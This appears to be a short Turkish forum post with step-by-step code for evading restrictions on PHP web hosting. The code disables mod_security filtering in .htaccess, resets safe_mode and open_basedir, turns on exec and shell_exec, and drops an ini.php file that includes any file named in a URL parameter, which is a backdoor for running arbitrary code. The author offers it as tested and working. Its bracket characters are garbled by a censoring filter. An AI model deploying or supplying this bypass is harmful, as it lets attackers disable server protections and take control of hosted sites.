1-).htaccess dosyanızın içine aşağıdaki kodu ekleyin.
# BEGIN safe mode <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule> # END safe mode2-)ini.php dosyası oluşturup içine aşağıdaki kodu ekleyin ve htaccess in olduğu yere atın.
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GETsansursansursansur91;"file"sansursansursansur93;);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GETsansursansursansur91;"ss"sansursansursansur93;);
?>3-) php.ini dosyası oluşturup içine aşağıdaki kodu ekleyin ve htaccess in olduğu yere atınız.
safe_mode = off exec = On shell_exec = OnKendim denedim çalışıyor. Kolay gelsin herkese...